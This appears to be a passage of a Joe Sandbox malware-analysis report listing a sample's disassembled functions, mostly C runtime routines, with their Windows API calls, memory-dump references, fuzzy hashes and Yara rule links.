Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: 2ded2b5c2a0a65581fc44a5f1b382f551ecfc8286e63e2e85760f546e75e70da
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: 4221A461F08642D1FE2ABF25F8113B9D270BF48394FE00532D65D869E5EE2CE906C720

Function 00007FF7691B4938 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B4965
CreateFileW.KERNELBASE ref: 00007FF7691B49A4
CloseHandle.KERNEL32 ref: 00007FF7691B49D9

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction ID: c2eeb7f67fa1e534e526dd6ba652d07add4fafd3948086991fac0e0a2c5cdccf
Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction Fuzzy Hash: 3141A422E18782C3F758AF21A550379A271FB98764F60D334E69D03AD9DF7CA1E08720

Function 00007FF7691ABF5C Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7691AC12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7691AC140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7691ABF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF7691ABFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7691AC041

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: bfec92e3096652305083d854b917d71b81dec52d2203318917b55f33305ec71f
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: 7C313815A4C243C2FE1DBF64B6513B9A2B19F41784FE44035E90E8BAD7DE2CAC04C675

Function 00007FF7691B8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7691B8D44), ref: 00007FF7691B8D59
TerminateProcess.KERNEL32(?,?,?,00007FF7691B8D44), ref: 00007FF7691B8D64
ExitProcess.KERNEL32 ref: 00007FF7691B8D73

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction ID: 10f045a32a5edf8b4d635272e143ea51e5789b26839b77cb43b70708e02479d1
Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction Fuzzy Hash: 89D06714B59606C7EA5C3F70785917992365F58B01FA41879D84B46397CD2CA80D8660

Function 00007FF7691AF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691AF4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691AF597

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
Instruction ID: 5d3803f92845211881e63d25be5c5f99ac52e72a5e15fca33c32aa2e28fcc336
Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
Instruction Fuzzy Hash: FB51DA61B09252CAF62DBE26B40067AE6B1BF44BB8FA44634DD7D47BD5CE3CD8019720

Function 00007FF7691B9E68 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7691B9CE5,?,?,00000000,00007FF7691B9D9A), ref: 00007FF7691B9ED6
GetLastError.KERNEL32(?,?,?,00007FF7691B9CE5,?,?,00000000,00007FF7691B9D9A), ref: 00007FF7691B9EE0

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: a0043869fd1f88a6122e54dd6c9e6b79920fa177b9c3f9d4a6f96f98f6811713
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: D3218711F1C642C1FE987F61B59037DA6B35F947A4FB84235DA2E477D9CE6CA4418320

Function 00007FF7691BB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF7691BB5DD), ref: 00007FF7691BB490
GetLastError.KERNEL32(?,?,?,?,?,00007FF7691BB5DD), ref: 00007FF7691BB49A

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: edd4a2c957f701c729d504657b930d7a95042024010cfe5e7d82f6c8050b47bb
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: 99119161B18A91C1DA54AF26F884169B372BB44BF4FA84331EE7E47BE9CE7CD0508750

Function 00007FF7691BB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BB1E4

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: 32ce4742f2c3880c45a5b0e5e16a1bdfc2d66e0da6f8150cd1ca27090b7cb1fa
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 8241D332908201C7EA28AF15B59127DB3B2EB55B94FA40131D69E87AD8CF3CF502C760

Function 00007FF7691A76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7691A774A

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: d03e57727a3ddcd9b75824e7054145c13dfede08f3066f385c444dbc992ff91c
Instruction ID: 6f79cfd9432875a84dd3bbbc2d39a909d240b9ffa5eccfb5efc51e3e76127f0f
Opcode Fuzzy Hash: d03e57727a3ddcd9b75824e7054145c13dfede08f3066f385c444dbc992ff91c
Instruction Fuzzy Hash: 20219611F08651C5FA18BE96B5083BAE6A1BF45BD4FE84431EE0D07B8ACE7DE941C710

Function 00007FF7691BAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BACD2

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction ID: 9347c6d57750f04b78ff00014c1fd94af4c5ce005d4ecfb38a6ce5a9ff26a639
Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction Fuzzy Hash: B731A021A18662C2F759BF15E8413BDA6B2AB50BB0FE54135EA6D433E6CE7CE4418330

Function 00007FF7691B8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7691B8CA7

Part of subcall function 00007FF7691B8DA0: GetModuleHandleExW.KERNEL32 ref: 00007FF7691B8DC5
Part of subcall function 00007FF7691B8DA0: GetProcAddress.KERNEL32 ref: 00007FF7691B8DDB
Part of subcall function 00007FF7691B8DA0: FreeLibrary.KERNEL32 ref: 00007FF7691B8E02

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction ID: 1b6e18f1b43ee7a29d32509c3ee8fbfb4a25623635a25c5396ca3e6c7b488ca3
Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction Fuzzy Hash: F921A372A15706CAEB18AF64D4402EC73B1FB04B18FA40676D72C06AC9DF38E445C750

Function 00007FF7691B52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B5209

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 8f6c764ad0c2c361205613e3be5214f9477736449020e5de6b46a47b47f8833b
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: 32119621A1D681C1EA68BF51F41027EE276AF55B84FE44431EB4D976DECF3CD4418760

Function 00007FF7691C5664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C5687

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: 50e037da462eef05f8da5eadccf0c6dbab9b3df4636b6385c7c54e1ae8a76312
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: BA21957261CA81C6DB65AF18F480379B6B1EB94B94FB44234E65D876D9DF3CD4408B10

Function 00007FF7691AF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691AF730

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: 677ca383739298bc03a8737a6d36311b32d9978a54b1ba4cba70b212086619d7
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 6701A921A08742C0E908FF566901069E6B5EB55FE0F984631DE6C13BDADE3CD8029710

Function 00007FF7691BC90C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF7691AFFB0,?,?,?,00007FF7691B161A,?,?,?,?,?,00007FF7691B2E09), ref: 00007FF7691BC94A

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: 355f0ae6945eff8b08f54aa81d55d6ec4db1009abb077f67a4959e59eb23b2ee
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: 26F05800B18347C5FE5C7FA5785137992A25F99BA0FA84630982E862C9DE2CA4418230

Function 00007FF7691A81A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

LoadLibraryW.KERNELBASE(?,00007FF7691A5C06,?,00007FF7691A308E), ref: 00007FF7691A81C2

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
Instruction ID: 9a6c2912fe4c7a683c2507ab742c4724babfea1c36b48739555120d39be4f816
Opcode Fuzzy Hash: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
Instruction Fuzzy Hash: F7D0C211F28281C1FA48BF77BA4657991629F89BC0FE8C034EE1D03B4ADC3CD0804B00

Function 00007FF7691A8180 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,?,?,00007FF7691A33BF), ref: 00007FF7691A8184

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: fcbdb7a3bb33d61edf12612711e3872dd56886a0f228ec4408bb52a4007a3dc4
Instruction ID: 2f2b7d533a0856b710204b72f12c7d61b30025331dba30678f31ea55bc7eccb7
Opcode Fuzzy Hash: fcbdb7a3bb33d61edf12612711e3872dd56886a0f228ec4408bb52a4007a3dc4
Instruction Fuzzy Hash: CAB01220FE540FC599083B75AC4E03010606764702FE01220C007C2190CC0C00DB4A10

Non-executed Functions

Function 00007FF7691A79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7A1B
RemoveDirectoryW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7A9E
DeleteFileW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ABD
FindNextFileW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ACB
FindClose.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ADC
RemoveDirectoryW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7AE5

Strings

%s\*, xrefs: 00007FF7691A79E2

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: 37816defd342bae652e1769586292a74f9f788f8579f940ae5ec14237c27edfe
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: 46418221A0C542E5EA24BF64F4545B9A370FB94754FE40632D55E82AC8DF3CDB4ACB10

Function 00007FF7691AC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7691AC468
RtlCaptureContext.KERNEL32 ref: 00007FF7691AC495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7691AC4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF7691AC4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF7691AC544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7691AC561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7691AC56C

Memory Dump Source

